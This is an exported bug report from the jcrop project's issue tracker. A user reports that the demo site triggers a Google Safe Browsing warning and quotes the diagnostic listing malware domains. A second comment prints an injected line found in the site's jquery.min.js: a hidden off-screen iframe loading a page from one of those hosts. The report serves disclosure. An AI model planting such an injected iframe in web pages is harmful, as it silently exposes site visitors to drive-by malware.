search

tel8618217223380 / jcrop

Automatically exported from code.google.com/p/jcrop
0 stars 0 forks source link

possible malware on demo's website? #51

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago 
Not proper a software's bug.
Please review the demo pages from injected malicious code from third evil 
parties.

What steps will reproduce the problem?
1. open http://deepliquid.com/projects/Jcrop/demos.php with Google Chrome 
browser

What is the expected output? What do you see instead?
instead to see the website, a warning is spawned from google safe browsing.

What version of the product are you using? On what operating system?
windows xp + google chrome 10.0.648

Please provide any additional information below.
Safe Browsing
Diagnostic page for deepliquid.com/projects

What is the current listing status for deepliquid.com/projects?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 
days.

What happened when Google visited this site?
Of the 28 pages we tested on the site over the past 90 days, 3 page(s) resulted 
in malicious software being downloaded and installed without user consent. The 
last time Google visited this site was on 2011-04-16, and the last time 
suspicious content was found on this site was on 2011-04-16.
Malicious software includes 1 trojan(s), 1 exploit(s). Successful infection 
resulted in an average of 8 new process(es) on the target machine.

Malicious software is hosted on 3 domain(s), including rinks.cz.cc/, 
nuitanpows.cz.cc/, tomwrezv.cz.cc/.

This site was hosted on 1 network(s) including AS12200 (SLICE).

Has this site acted as an intermediary resulting in further distribution of 
malware?
Over the past 90 days, deepliquid.com/projects did not appear to function as an 
intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which 
would cause us to show the warning message.

extract from:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2
Fdeepliquid.com%2Fprojects%2FJcrop%2Fdemos.php&client=googlechrome&hl=en

Original issue reported on code.google.com by hukke...@gmail.com on 17 Apr 2011 at 6:36

GoogleCodeExporter commented 9 years ago 
found this statement on http://deepliquid.com/projects/Jcrop/js/jquery.min.js
line #1

document.write('<style>.en14occha3 { position:absolute; left:-1545px; 
top:-1615px} </style> <div class="en14occha3"><iframe 
src="http://nuitanpows.cz.cc/myi986px/counter.php?id=2"></iframe></div>');

-------------------------------

pls update priority

Original comment by hukke...@gmail.com on 17 Apr 2011 at 6:53